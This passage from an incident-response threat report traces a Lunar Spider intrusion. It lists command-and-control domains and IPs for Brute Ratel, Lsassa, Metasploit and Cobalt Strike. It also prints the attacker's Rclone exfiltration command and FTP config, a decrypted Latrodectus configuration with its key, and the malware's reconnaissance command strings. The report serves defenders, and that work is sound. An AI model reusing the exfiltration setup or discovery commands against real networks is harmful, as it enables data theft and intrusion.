ridiculous-breakpoint-gw[.]aws-use1[.]cloud-ara[.]tyk[.]io54.165.22.33 or 35.153.92.249 or 34.233.204.207 or 54.159.36.188 or 35.172.8.165 or 54.175.181.104 443 AMAZON-AES US uncertain-kitten-gw[.]aws-euc1[.]cloud-ara[.]tyk[.]io 3.72.42.242 or 3.69.236.35 or 35.157.36.116 or 3.66.241.8 or 3.124.114.34 or 3.69.194.165 443 AMAZON-02 DE On the fifth day, the threat actor deployed a second Brute Ratel badger, named wscadminui.dll, which communicated with the following domains: Domain IP Address Port ORG Country erbolsan[.]com 94.232.249.100 443 Psb Hosting Ltd  NL erbolsan[.]com 94.131.108.254 443 Pq Hosting Plus S.r.l. TR https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 34 of 48 samderat200[.]com 94.232.249.108 443 Psb Hosting Ltd  NL samderat200[.]com 45.150.65.85 443 Pq Hosting Plus S.r.l. US dauled[.]com 195.123.225.161 443 Green Floid LLC BG kasymdev[.]com 195.211.98.249 443 Green Floid LLC US kasym500[.]com 195.123.225.251 443 Green Floid LLC BG Lsassa Lsassa.exe was a .NET malware that was deployed on the fourth day. It attempted to communicate with its C2 server every 250 seconds. Additionally, each POST request contained the hostname of the infected workstation and the username of the compromised user, which were sent to the server. Domain IP Address Port Protocol ORG Country cloudmeri[.]com 162.0.209.121 443 HTTPS  NAMECHEAP-NET US Metasploit The psexec Metasploit module was utilized by the threat actor in order to perform lateral movement. During the analysis of the Metasploit shellcode, it was identified that it utilized the IP 217.196.98.61 to perform C2 communication. IP Address Port Protocol ORG Country 217.196.98.61 4444 TCP Aeza International LTD DE Although the Metasploit shellcode was executed, it was unable to establish a successful Command and Control connection, and the server rejected the connection. Cobalt Strike The final Command and Control tool used was Cobalt Strike. In the C2 communication, both HTTPS and HTTP traffic were detected: Beacon Domain IP Address Port Protocol ORG Country sys.dll avtechupdate[.]com 206.206.123.209 443 HTTPS Datacamp Limited US cron801.dl_,system.dl_ – 45.129.199.214 80 or 8080 HTTP BlueVPS OU EE https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 35 of 48 – – 31.13.248.153 80 or 8080 HTTP ASNET BG To summarize the Command and Control activity and showcase its intensity over time, the following graphs were made: Beaconing with Cobalt Strike Beaconing without Cobalt Strike https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 36 of 48 Exfiltration Rclone From a Cobalt Strike beacon on a file share server, the threat actor dropped a data exfiltration toolkit in the ProgramData directory. This included a VBScript launcher (start.vbs), batch automation script (run.bat), renamed Rclone (sihosts.exe), and Rclone configuration file (rclone.conf). This toolkit automated the theft of sensitive data by syncing it to threat actor-controlled cloud storage using the legitimate Rclone utility. Content of start.vbs Content of run.bat: C:\programdata\sihosts.exe copy "E:" ftp:REDACTED\\E -q --exclude "*.{ai,bin,blf,bmp The threat actor dropped the Rclone configuration file (rclone.conf) twice on the file share server in quick succession. The first rclone.conf file creation occurred three minutes before the second one, with two executions occurring between them, hinting that there may have been a mistake in the first config file dropped by the threat actor. The first execution had a syntax error with specifying the drive to exfiltrate files from (threat actor added an extra colon to the drive), and the second execution showed that the threat actor had initially dropped the config file with an incorrect username added to it. The FTP traffic shows that the username used was J0eBidenAbrabdy1aS3ha2 when it should have been J0eBidenAbrabdy1aS3ha2Yeami which was the username found in the rclone.conf file found on the infected device (the same password was used in both executions). https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 37 of 48 [ftp] type = ftp host = 45.135.232.3 user = J0eBidenAbrabdy1aS3ha2Yeami #port = 21 pass = #tls = false Exfiltration activity took place over 9 hours and 46 minutes. Impact As discussed in the Exfiltration section, on the twentieth day, the threat actor successfully performed data exfiltration. Despite that, no further final actions on objectives were performed until they were evicted from the network. Timeline https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 38 of 48 https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 39 of 48 Diamond Model https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 40 of 48 https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 41 of 48 Indicators Atomic RDP Client Name VPS2DAY-32220LE Rclone configuration host: 45.135.232.3 user: J0eBidenAbrabdy1aS3ha2Yeami user: J0eBidenAbrabdy1aS3ha2 Latrodectus Domains workspacin[.]cloud illoskanawer[.]com grasmetral[.]com jarkaairbo[.]com scupolasta[.]store Backconnect IP Addresses 185.93.221.12 193.168.143.196 Lsassa Backdoor Domain cloudmeri[.]com Lsassa Backdoor IP Addresses 162.0.209.121 Brute Ratel Domains anikvan[.]com altynbe[.]com https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 42 of 48 boriz400[.]com ridiculous-breakpoint-gw[.]aws-use1[.]cloud-ara[.]tyk[.]io uncertain-kitten-gw[.]aws-euc1[.]cloud-ara[.]tyk[.]io erbolsan[.]com samderat200[.]com dauled[.]com kasymdev[.]com kasym500[.]com Brute Ratel IP Addresses 95.164.68.73 138.124.183.215 91.194.11.183 94.232.249.100 94.131.108.254 94.232.249.108 45.150.65.85 195.123.225.161 195.211.98.249 195.123.225.251 Metasploit IP Addresses 217.196.98.61 Cobalt Strike Domains avtechupdate[.]com Cobalt Strike IP Addresses 206.206.123.209 45.129.199.214 31.13.248.153 Latrodectus Configuration Config: { "Version": "1.3", "Direction": "4", "C2s": [ "hxxps://workspacin[.]cloud/live/", "hxxps://illoskanawer[.]com/live/" ], "RC4": "xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8", "GroupID": "2221766521", "CampaignID": "Electrol" } Decrypted Strings: { "pid": "%d", "proc": https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 43 of 48 "%s", "subproc": [ ] } &desklinks=[ *.* "%s" ] &proclist=[ { "pid": "%d", "proc": "%s", "subproc": [ ] } /c ipconfig /all C:\Windows\System32\cmd.exe /c systeminfo C:\Windows\System32\cmd.exe /c nltest /domain_trusts C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts C:\Windows\System32\cmd.exe /c net view /all /domain C:\Windows\System32\cmd.exe /c net view /all C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain C:\Windows\System32\cmd.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List C:\Windows\System32\wbem\wmic.exe /c net config workstation C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | f C:\Windows\System32\cmd.exe /c whoami /groups C:\Windows\System32\cmd.exe &ipconfig= &systeminfo= &domain_trusts= &domain_trusts_all= &net_view_all_domain= &net_view_all= &net_group= &wmic= &net_config_ws= &net_wmic_av= &whoami_group= runnung front /files/ https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/ Page 44 of 48 %d %s%s files/bp.dat %s\%d.dll %d.dat %s\%s init -zzzz="%s\%s" Electrol Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Content-Type: application/x-www-form-urlencoded POST GET CLEARURL URLS COMMAND ERROR xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8 counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ https://workspacin.cloud/live/ https://illoskanawer.com/live/ %s%d.dll %s%d.exe Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)